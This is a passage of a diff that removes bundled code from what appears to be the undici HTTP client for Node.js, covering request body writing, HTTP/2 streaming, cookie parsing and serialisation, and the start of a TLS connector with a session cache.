stream, - header: '' - }) - } else if (util.isIterable(body)) { - writeIterable({ - body, - client, - request, - contentLength, - expectsPayload, - header: '', - h2stream: stream, - socket: client[kSocket] - }) - } else { - assert(false) - } - } -} - -function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') - - if 
(client[kHTTPConnVersion] === 'h2') { - // For HTTP/2, is enough to pipe the stream - const pipe = pipeline( - body, - h2stream, - (err) => { - if (err) { - util.destroy(body, err) - util.destroy(h2stream, err) - } else { - request.onRequestSent() - } - } - ) - - pipe.on('data', onPipeData) - pipe.once('end', () => { - pipe.removeListener('data', onPipeData) - util.destroy(pipe) - }) - - function onPipeData (chunk) { - request.onBodySent(chunk) - } - - return - } - - let finished = false - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - - const onData = function (chunk) { - if (finished) { - return - } - - try { - if (!writer.write(chunk) && this.pause) { - this.pause() - } - } catch (err) { - util.destroy(this, err) - } - } - const onDrain = function () { - if (finished) { - return - } - - if (body.resume) { - body.resume() - } - } - const onAbort = function () { - if (finished) { - return - } - const err = new RequestAbortedError() - queueMicrotask(() => onFinished(err)) - } - const onFinished = function (err) { - if (finished) { - return - } - - finished = true - - assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) - - socket - .off('drain', onDrain) - .off('error', onFinished) - - body - .removeListener('data', onData) - .removeListener('end', onFinished) - .removeListener('error', onFinished) - .removeListener('close', onAbort) - - if (!err) { - try { - writer.end() - } catch (er) { - err = er - } - } - - writer.destroy(err) - - if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { - util.destroy(body, err) - } else { - util.destroy(body) - } - } - - body - .on('data', onData) - .on('end', onFinished) - .on('error', onFinished) - .on('close', onAbort) - - if (body.resume) { - body.resume() - } - - socket - .on('drain', onDrain) - .on('error', onFinished) -} - -async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) 
{ - assert(contentLength === body.size, 'blob body must have content length') - - const isH2 = client[kHTTPConnVersion] === 'h2' - try { - if (contentLength != null && contentLength !== body.size) { - throw new RequestContentLengthMismatchError() - } - - const buffer = Buffer.from(await body.arrayBuffer()) - - if (isH2) { - h2stream.cork() - h2stream.write(buffer) - h2stream.uncork() - } else { - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(buffer) - socket.uncork() - } - - request.onBodySent(buffer) - request.onRequestSent() - - if (!expectsPayload) { - socket[kReset] = true - } - - resume(client) - } catch (err) { - util.destroy(isH2 ? h2stream : socket, err) - } -} - -async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { - assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') - - let callback = null - function onDrain () { - if (callback) { - const cb = callback - callback = null - cb() - } - } - - const waitForDrain = () => new Promise((resolve, reject) => { - assert(callback === null) - - if (socket[kError]) { - reject(socket[kError]) - } else { - callback = resolve - } - }) - - if (client[kHTTPConnVersion] === 'h2') { - h2stream - .on('close', onDrain) - .on('drain', onDrain) - - try { - // It's up to the user to somehow abort the async iterable. 
- for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - const res = h2stream.write(chunk) - request.onBodySent(chunk) - if (!res) { - await waitForDrain() - } - } - } catch (err) { - h2stream.destroy(err) - } finally { - request.onRequestSent() - h2stream.end() - h2stream - .off('close', onDrain) - .off('drain', onDrain) - } - - return - } - - socket - .on('close', onDrain) - .on('drain', onDrain) - - const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) - try { - // It's up to the user to somehow abort the async iterable. - for await (const chunk of body) { - if (socket[kError]) { - throw socket[kError] - } - - if (!writer.write(chunk)) { - await waitForDrain() - } - } - - writer.end() - } catch (err) { - writer.destroy(err) - } finally { - socket - .off('close', onDrain) - .off('drain', onDrain) - } -} - -class AsyncWriter { - constructor ({ socket, request, contentLength, client, expectsPayload, header }) { - this.socket = socket - this.request = request - this.contentLength = contentLength - this.client = client - this.bytesWritten = 0 - this.expectsPayload = expectsPayload - this.header = header - - socket[kWriting] = true - } - - write (chunk) { - const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return false - } - - const len = Buffer.byteLength(chunk) - if (!len) { - return true - } - - // We should defer writing chunks. 
- if (contentLength !== null && bytesWritten + len > contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - socket.cork() - - if (bytesWritten === 0) { - if (!expectsPayload) { - socket[kReset] = true - } - - if (contentLength === null) { - socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') - } else { - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - } - } - - if (contentLength === null) { - socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') - } - - this.bytesWritten += len - - const ret = socket.write(chunk) - - socket.uncork() - - request.onBodySent(chunk) - - if (!ret) { - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - } - - return ret - } - - end () { - const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this - request.onRequestSent() - - socket[kWriting] = false - - if (socket[kError]) { - throw socket[kError] - } - - if (socket.destroyed) { - return - } - - if (bytesWritten === 0) { - if (expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD send a Content-Length in a request message when - // no Transfer-Encoding is sent and the request method defines a meaning - // for an enclosed payload body. 
- - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - socket.write(`${header}\r\n`, 'latin1') - } - } else if (contentLength === null) { - socket.write('\r\n0\r\n\r\n', 'latin1') - } - - if (contentLength !== null && bytesWritten !== contentLength) { - if (client[kStrictContentLength]) { - throw new RequestContentLengthMismatchError() - } else { - process.emitWarning(new RequestContentLengthMismatchError()) - } - } - - if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { - // istanbul ignore else: only for jest - if (socket[kParser].timeout.refresh) { - socket[kParser].timeout.refresh() - } - } - - resume(client) - } - - destroy (err) { - const { socket, client } = this - - socket[kWriting] = false - - if (err) { - assert(client[kRunning] <= 1, 'pipeline should only contain this request') - util.destroy(socket, err) - } - } -} - -function errorRequest (client, request, err) { - try { - request.onError(err) - assert(request.aborted) - } catch (err) { - client.emit('error', err) - } -} - -module.exports = Client - - -/***/ }), - -/***/ 6436: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/* istanbul ignore file: only for Node 12 */ - -const { kConnected, kSize } = __nccwpck_require__(2785) - -class CompatWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value[kConnected] === 0 && this.value[kSize] === 0 - ? 
undefined - : this.value - } -} - -class CompatFinalizer { - constructor (finalizer) { - this.finalizer = finalizer - } - - register (dispatcher, key) { - if (dispatcher.on) { - dispatcher.on('disconnect', () => { - if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { - this.finalizer(key) - } - }) - } - } -} - -module.exports = function () { - // FIXME: remove workaround when the Node bug is fixed - // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 - if (process.env.NODE_V8_COVERAGE) { - return { - WeakRef: CompatWeakRef, - FinalizationRegistry: CompatFinalizer - } - } - return { - WeakRef: global.WeakRef || CompatWeakRef, - FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer - } -} - - -/***/ }), - -/***/ 663: -/***/ ((module) => { - -"use strict"; - - -// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size -const maxAttributeValueSize = 1024 - -// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size -const maxNameValuePairSize = 4096 - -module.exports = { - maxAttributeValueSize, - maxNameValuePairSize -} - - -/***/ }), - -/***/ 1724: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { parseSetCookie } = __nccwpck_require__(4408) -const { stringify, getHeadersList } = __nccwpck_require__(3121) -const { webidl } = __nccwpck_require__(1744) -const { Headers } = __nccwpck_require__(554) - -/** - * @typedef {Object} Cookie - * @property {string} name - * @property {string} value - * @property {Date|number|undefined} expires - * @property {number|undefined} maxAge - * @property {string|undefined} domain - * @property {string|undefined} path - * @property {boolean|undefined} secure - * @property {boolean|undefined} httpOnly - * @property {'Strict'|'Lax'|'None'} sameSite - * @property {string[]} unparsed - */ - -/** - * @param {Headers} headers - * @returns {Record} - */ -function getCookies (headers) { - 
webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookie = headers.get('cookie') - const out = {} - - if (!cookie) { - return out - } - - for (const piece of cookie.split(';')) { - const [name, ...value] = piece.split('=') - - out[name.trim()] = value.join('=') - } - - return out -} - -/** - * @param {Headers} headers - * @param {string} name - * @param {{ path?: string, domain?: string }|undefined} attributes - * @returns {void} - */ -function deleteCookie (headers, name, attributes) { - webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - name = webidl.converters.DOMString(name) - attributes = webidl.converters.DeleteCookieAttributes(attributes) - - // Matches behavior of - // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 - setCookie(headers, { - name, - value: '', - expires: new Date(0), - ...attributes - }) -} - -/** - * @param {Headers} headers - * @returns {Cookie[]} - */ -function getSetCookies (headers) { - webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - const cookies = getHeadersList(headers).cookies - - if (!cookies) { - return [] - } - - // In older versions of undici, cookies is a list of name:value. - return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? 
pair[1] : pair)) -} - -/** - * @param {Headers} headers - * @param {Cookie} cookie - * @returns {void} - */ -function setCookie (headers, cookie) { - webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) - - webidl.brandCheck(headers, Headers, { strict: false }) - - cookie = webidl.converters.Cookie(cookie) - - const str = stringify(cookie) - - if (str) { - headers.append('Set-Cookie', stringify(cookie)) - } -} - -webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - } -]) - -webidl.converters.Cookie = webidl.dictionaryConverter([ - { - converter: webidl.converters.DOMString, - key: 'name' - }, - { - converter: webidl.converters.DOMString, - key: 'value' - }, - { - converter: webidl.nullableConverter((value) => { - if (typeof value === 'number') { - return webidl.converters['unsigned long long'](value) - } - - return new Date(value) - }), - key: 'expires', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters['long long']), - key: 'maxAge', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'domain', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.DOMString), - key: 'path', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'secure', - defaultValue: null - }, - { - converter: webidl.nullableConverter(webidl.converters.boolean), - key: 'httpOnly', - defaultValue: null - }, - { - converter: webidl.converters.USVString, - key: 'sameSite', - allowedValues: ['Strict', 'Lax', 'None'] - }, - { - converter: webidl.sequenceConverter(webidl.converters.DOMString), - key: 'unparsed', - defaultValue: [] - } -]) - -module.exports = { - getCookies, - 
deleteCookie, - getSetCookies, - setCookie -} - - -/***/ }), - -/***/ 4408: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) -const { isCTLExcludingHtab } = __nccwpck_require__(3121) -const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) -const assert = __nccwpck_require__(9491) - -/** - * @description Parses the field-value attributes of a set-cookie header string. - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} header - * @returns if the header is invalid, null will be returned - */ -function parseSetCookie (header) { - // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F - // character (CTL characters excluding HTAB): Abort these steps and - // ignore the set-cookie-string entirely. - if (isCTLExcludingHtab(header)) { - return null - } - - let nameValuePair = '' - let unparsedAttributes = '' - let name = '' - let value = '' - - // 2. If the set-cookie-string contains a %x3B (";") character: - if (header.includes(';')) { - // 1. The name-value-pair string consists of the characters up to, - // but not including, the first %x3B (";"), and the unparsed- - // attributes consist of the remainder of the set-cookie-string - // (including the %x3B (";") in question). - const position = { position: 0 } - - nameValuePair = collectASequenceOfCodePointsFast(';', header, position) - unparsedAttributes = header.slice(position.position) - } else { - // Otherwise: - - // 1. The name-value-pair string consists of all the characters - // contained in the set-cookie-string, and the unparsed- - // attributes is the empty string. - nameValuePair = header - } - - // 3. If the name-value-pair string lacks a %x3D ("=") character, then - // the name string is empty, and the value string is the value of - // name-value-pair. 
- if (!nameValuePair.includes('=')) { - value = nameValuePair - } else { - // Otherwise, the name string consists of the characters up to, but - // not including, the first %x3D ("=") character, and the (possibly - // empty) value string consists of the characters after the first - // %x3D ("=") character. - const position = { position: 0 } - name = collectASequenceOfCodePointsFast( - '=', - nameValuePair, - position - ) - value = nameValuePair.slice(position.position + 1) - } - - // 4. Remove any leading or trailing WSP characters from the name - // string and the value string. - name = name.trim() - value = value.trim() - - // 5. If the sum of the lengths of the name string and the value string - // is more than 4096 octets, abort these steps and ignore the set- - // cookie-string entirely. - if (name.length + value.length > maxNameValuePairSize) { - return null - } - - // 6. The cookie-name is the name string, and the cookie-value is the - // value string. - return { - name, value, ...parseUnparsedAttributes(unparsedAttributes) - } -} - -/** - * Parses the remaining attributes of a set-cookie header - * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 - * @param {string} unparsedAttributes - * @param {[Object.]={}} cookieAttributeList - */ -function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { - // 1. If the unparsed-attributes string is empty, skip the rest of - // these steps. - if (unparsedAttributes.length === 0) { - return cookieAttributeList - } - - // 2. Discard the first character of the unparsed-attributes (which - // will be a %x3B (";") character). - assert(unparsedAttributes[0] === ';') - unparsedAttributes = unparsedAttributes.slice(1) - - let cookieAv = '' - - // 3. If the remaining unparsed-attributes contains a %x3B (";") - // character: - if (unparsedAttributes.includes(';')) { - // 1. 
Consume the characters of the unparsed-attributes up to, but - // not including, the first %x3B (";") character. - cookieAv = collectASequenceOfCodePointsFast( - ';', - unparsedAttributes, - { position: 0 } - ) - unparsedAttributes = unparsedAttributes.slice(cookieAv.length) - } else { - // Otherwise: - - // 1. Consume the remainder of the unparsed-attributes. - cookieAv = unparsedAttributes - unparsedAttributes = '' - } - - // Let the cookie-av string be the characters consumed in this step. - - let attributeName = '' - let attributeValue = '' - - // 4. If the cookie-av string contains a %x3D ("=") character: - if (cookieAv.includes('=')) { - // 1. The (possibly empty) attribute-name string consists of the - // characters up to, but not including, the first %x3D ("=") - // character, and the (possibly empty) attribute-value string - // consists of the characters after the first %x3D ("=") - // character. - const position = { position: 0 } - - attributeName = collectASequenceOfCodePointsFast( - '=', - cookieAv, - position - ) - attributeValue = cookieAv.slice(position.position + 1) - } else { - // Otherwise: - - // 1. The attribute-name string consists of the entire cookie-av - // string, and the attribute-value string is empty. - attributeName = cookieAv - } - - // 5. Remove any leading or trailing WSP characters from the attribute- - // name string and the attribute-value string. - attributeName = attributeName.trim() - attributeValue = attributeValue.trim() - - // 6. If the attribute-value is longer than 1024 octets, ignore the - // cookie-av string and return to Step 1 of this algorithm. - if (attributeValue.length > maxAttributeValueSize) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 7. Process the attribute-name and attribute-value according to the - // requirements in the following subsections. (Notice that - // attributes with unrecognized attribute-names are ignored.) 
- const attributeNameLowercase = attributeName.toLowerCase() - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 - // If the attribute-name case-insensitively matches the string - // "Expires", the user agent MUST process the cookie-av as follows. - if (attributeNameLowercase === 'expires') { - // 1. Let the expiry-time be the result of parsing the attribute-value - // as cookie-date (see Section 5.1.1). - const expiryTime = new Date(attributeValue) - - // 2. If the attribute-value failed to parse as a cookie date, ignore - // the cookie-av. - - cookieAttributeList.expires = expiryTime - } else if (attributeNameLowercase === 'max-age') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 - // If the attribute-name case-insensitively matches the string "Max- - // Age", the user agent MUST process the cookie-av as follows. - - // 1. If the first character of the attribute-value is not a DIGIT or a - // "-" character, ignore the cookie-av. - const charCode = attributeValue.charCodeAt(0) - - if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 2. If the remainder of attribute-value contains a non-DIGIT - // character, ignore the cookie-av. - if (!/^\d+$/.test(attributeValue)) { - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) - } - - // 3. Let delta-seconds be the attribute-value converted to an integer. - const deltaSeconds = Number(attributeValue) - - // 4. Let cookie-age-limit be the maximum age of the cookie (which - // SHOULD be 400 days or less, see Section 4.1.2.2). - - // 5. Set delta-seconds to the smaller of its present value and cookie- - // age-limit. - // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) - - // 6. If delta-seconds is less than or equal to zero (0), let expiry- - // time be the earliest representable date and time. 
Otherwise, let - // the expiry-time be the current date and time plus delta-seconds - // seconds. - // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds - - // 7. Append an attribute to the cookie-attribute-list with an - // attribute-name of Max-Age and an attribute-value of expiry-time. - cookieAttributeList.maxAge = deltaSeconds - } else if (attributeNameLowercase === 'domain') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 - // If the attribute-name case-insensitively matches the string "Domain", - // the user agent MUST process the cookie-av as follows. - - // 1. Let cookie-domain be the attribute-value. - let cookieDomain = attributeValue - - // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be - // cookie-domain without its leading %x2E ("."). - if (cookieDomain[0] === '.') { - cookieDomain = cookieDomain.slice(1) - } - - // 3. Convert the cookie-domain to lower case. - cookieDomain = cookieDomain.toLowerCase() - - // 4. Append an attribute to the cookie-attribute-list with an - // attribute-name of Domain and an attribute-value of cookie-domain. - cookieAttributeList.domain = cookieDomain - } else if (attributeNameLowercase === 'path') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 - // If the attribute-name case-insensitively matches the string "Path", - // the user agent MUST process the cookie-av as follows. - - // 1. If the attribute-value is empty or if the first character of the - // attribute-value is not %x2F ("/"): - let cookiePath = '' - if (attributeValue.length === 0 || attributeValue[0] !== '/') { - // 1. Let cookie-path be the default-path. - cookiePath = '/' - } else { - // Otherwise: - - // 1. Let cookie-path be the attribute-value. - cookiePath = attributeValue - } - - // 2. Append an attribute to the cookie-attribute-list with an - // attribute-name of Path and an attribute-value of cookie-path. 
- cookieAttributeList.path = cookiePath - } else if (attributeNameLowercase === 'secure') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 - // If the attribute-name case-insensitively matches the string "Secure", - // the user agent MUST append an attribute to the cookie-attribute-list - // with an attribute-name of Secure and an empty attribute-value. - - cookieAttributeList.secure = true - } else if (attributeNameLowercase === 'httponly') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 - // If the attribute-name case-insensitively matches the string - // "HttpOnly", the user agent MUST append an attribute to the cookie- - // attribute-list with an attribute-name of HttpOnly and an empty - // attribute-value. - - cookieAttributeList.httpOnly = true - } else if (attributeNameLowercase === 'samesite') { - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 - // If the attribute-name case-insensitively matches the string - // "SameSite", the user agent MUST process the cookie-av as follows: - - // 1. Let enforcement be "Default". - let enforcement = 'Default' - - const attributeValueLowercase = attributeValue.toLowerCase() - // 2. If cookie-av's attribute-value is a case-insensitive match for - // "None", set enforcement to "None". - if (attributeValueLowercase.includes('none')) { - enforcement = 'None' - } - - // 3. If cookie-av's attribute-value is a case-insensitive match for - // "Strict", set enforcement to "Strict". - if (attributeValueLowercase.includes('strict')) { - enforcement = 'Strict' - } - - // 4. If cookie-av's attribute-value is a case-insensitive match for - // "Lax", set enforcement to "Lax". - if (attributeValueLowercase.includes('lax')) { - enforcement = 'Lax' - } - - // 5. Append an attribute to the cookie-attribute-list with an - // attribute-name of "SameSite" and an attribute-value of - // enforcement. 
- cookieAttributeList.sameSite = enforcement - } else { - cookieAttributeList.unparsed ??= [] - - cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) - } - - // 8. Return to Step 1 of this algorithm. - return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) -} - -module.exports = { - parseSetCookie, - parseUnparsedAttributes -} - - -/***/ }), - -/***/ 3121: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kHeadersList } = __nccwpck_require__(2785) - -function isCTLExcludingHtab (value) { - if (value.length === 0) { - return false - } - - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - (code >= 0x00 || code <= 0x08) || - (code >= 0x0A || code <= 0x1F) || - code === 0x7F - ) { - return false - } - } -} - -/** - CHAR = - token = 1* - separators = "(" | ")" | "<" | ">" | "@" - | "," | ";" | ":" | "\" | <"> - | "/" | "[" | "]" | "?" | "=" - | "{" | "}" | SP | HT - * @param {string} name - */ -function validateCookieName (name) { - for (const char of name) { - const code = char.charCodeAt(0) - - if ( - (code <= 0x20 || code > 0x7F) || - char === '(' || - char === ')' || - char === '>' || - char === '<' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' 
|| - char === '=' || - char === '{' || - char === '}' - ) { - throw new Error('Invalid cookie name') - } - } -} - -/** - cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) - cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E - ; US-ASCII characters excluding CTLs, - ; whitespace DQUOTE, comma, semicolon, - ; and backslash - * @param {string} value - */ -function validateCookieValue (value) { - for (const char of value) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || // exclude CTLs (0-31) - code === 0x22 || - code === 0x2C || - code === 0x3B || - code === 0x5C || - code > 0x7E // non-ascii - ) { - throw new Error('Invalid header value') - } - } -} - -/** - * path-value = - * @param {string} path - */ -function validateCookiePath (path) { - for (const char of path) { - const code = char.charCodeAt(0) - - if (code < 0x21 || char === ';') { - throw new Error('Invalid cookie path') - } - } -} - -/** - * I have no idea why these values aren't allowed to be honest, - * but Deno tests these. 
- Khafra - * @param {string} domain - */ -function validateCookieDomain (domain) { - if ( - domain.startsWith('-') || - domain.endsWith('.') || - domain.endsWith('-') - ) { - throw new Error('Invalid cookie domain') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 - * @param {number|Date} date - IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT - ; fixed length/zone/capitalization subset of the format - ; see Section 3.3 of [RFC5322] - - day-name = %x4D.6F.6E ; "Mon", case-sensitive - / %x54.75.65 ; "Tue", case-sensitive - / %x57.65.64 ; "Wed", case-sensitive - / %x54.68.75 ; "Thu", case-sensitive - / %x46.72.69 ; "Fri", case-sensitive - / %x53.61.74 ; "Sat", case-sensitive - / %x53.75.6E ; "Sun", case-sensitive - date1 = day SP month SP year - ; e.g., 02 Jun 1982 - - day = 2DIGIT - month = %x4A.61.6E ; "Jan", case-sensitive - / %x46.65.62 ; "Feb", case-sensitive - / %x4D.61.72 ; "Mar", case-sensitive - / %x41.70.72 ; "Apr", case-sensitive - / %x4D.61.79 ; "May", case-sensitive - / %x4A.75.6E ; "Jun", case-sensitive - / %x4A.75.6C ; "Jul", case-sensitive - / %x41.75.67 ; "Aug", case-sensitive - / %x53.65.70 ; "Sep", case-sensitive - / %x4F.63.74 ; "Oct", case-sensitive - / %x4E.6F.76 ; "Nov", case-sensitive - / %x44.65.63 ; "Dec", case-sensitive - year = 4DIGIT - - GMT = %x47.4D.54 ; "GMT", case-sensitive - - time-of-day = hour ":" minute ":" second - ; 00:00:00 - 23:59:60 (leap second) - - hour = 2DIGIT - minute = 2DIGIT - second = 2DIGIT - */ -function toIMFDate (date) { - if (typeof date === 'number') { - date = new Date(date) - } - - const days = [ - 'Sun', 'Mon', 'Tue', 'Wed', - 'Thu', 'Fri', 'Sat' - ] - - const months = [ - 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', - 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' - ] - - const dayName = days[date.getUTCDay()] - const day = date.getUTCDate().toString().padStart(2, '0') - const month = months[date.getUTCMonth()] - const year = date.getUTCFullYear() - const hour = 
date.getUTCHours().toString().padStart(2, '0') - const minute = date.getUTCMinutes().toString().padStart(2, '0') - const second = date.getUTCSeconds().toString().padStart(2, '0') - - return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` -} - -/** - max-age-av = "Max-Age=" non-zero-digit *DIGIT - ; In practice, both expires-av and max-age-av - ; are limited to dates representable by the - ; user agent. - * @param {number} maxAge - */ -function validateCookieMaxAge (maxAge) { - if (maxAge < 0) { - throw new Error('Invalid cookie max-age') - } -} - -/** - * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 - * @param {import('./index').Cookie} cookie - */ -function stringify (cookie) { - if (cookie.name.length === 0) { - return null - } - - validateCookieName(cookie.name) - validateCookieValue(cookie.value) - - const out = [`${cookie.name}=${cookie.value}`] - - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 - // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 - if (cookie.name.startsWith('__Secure-')) { - cookie.secure = true - } - - if (cookie.name.startsWith('__Host-')) { - cookie.secure = true - cookie.domain = null - cookie.path = '/' - } - - if (cookie.secure) { - out.push('Secure') - } - - if (cookie.httpOnly) { - out.push('HttpOnly') - } - - if (typeof cookie.maxAge === 'number') { - validateCookieMaxAge(cookie.maxAge) - out.push(`Max-Age=${cookie.maxAge}`) - } - - if (cookie.domain) { - validateCookieDomain(cookie.domain) - out.push(`Domain=${cookie.domain}`) - } - - if (cookie.path) { - validateCookiePath(cookie.path) - out.push(`Path=${cookie.path}`) - } - - if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { - out.push(`Expires=${toIMFDate(cookie.expires)}`) - } - - if (cookie.sameSite) { - out.push(`SameSite=${cookie.sameSite}`) - } - - for (const part of cookie.unparsed) { - if (!part.includes('=')) { - throw new 
Error('Invalid unparsed') - } - - const [key, ...value] = part.split('=') - - out.push(`${key.trim()}=${value.join('=')}`) - } - - return out.join('; ') -} - -let kHeadersListNode - -function getHeadersList (headers) { - if (headers[kHeadersList]) { - return headers[kHeadersList] - } - - if (!kHeadersListNode) { - kHeadersListNode = Object.getOwnPropertySymbols(headers).find( - (symbol) => symbol.description === 'headers list' - ) - - assert(kHeadersListNode, 'Headers cannot be parsed') - } - - const headersList = headers[kHeadersListNode] - assert(headersList) - - return headersList -} - -module.exports = { - isCTLExcludingHtab, - stringify, - getHeadersList -} - - -/***/ }), - -/***/ 2067: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const net = __nccwpck_require__(1808) -const assert = __nccwpck_require__(9491) -const util = __nccwpck_require__(3983) -const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) - -let tls // include tls conditionally since it is not always available - -// TODO: session re-use does not wait for the first -// connection to resolve the session and might therefore -// resolve the same servername multiple times even when -// re-use is enabled. 
- -let SessionCache -// FIXME: remove workaround when the Node bug is fixed -// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 -if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { - SessionCache = class WeakSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - this._sessionRegistry = new global.FinalizationRegistry((key) => { - if (this._sessionCache.size < this._maxCachedSessions) { - return - } - - const ref = this._sessionCache.get(key) - if (ref !== undefined && ref.deref() === undefined) { - this._sessionCache.delete(key) - } - }) - } - - get (sessionKey) { - const ref = this._sessionCache.get(sessionKey) - return ref ? ref.deref() : null - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - this._sessionCache.set(sessionKey, new WeakRef(session)) - this._sessionRegistry.register(session, sessionKey) - } - } -} else { - SessionCache = class SimpleSessionCache { - constructor (maxCachedSessions) { - this._maxCachedSessions = maxCachedSessions - this._sessionCache = new Map() - } - - get (sessionKey) { - return this._sessionCache.get(sessionKey) - } - - set (sessionKey, session) { - if (this._maxCachedSessions === 0) { - return - } - - if (this._sessionCache.size >= this._maxCachedSessions) { - // remove the oldest session - const { value: oldestKey } = this._sessionCache.keys().next() - this._sessionCache.delete(oldestKey) - } - - this._sessionCache.set(sessionKey, session) - } - } -} - -function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { - if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { - throw new 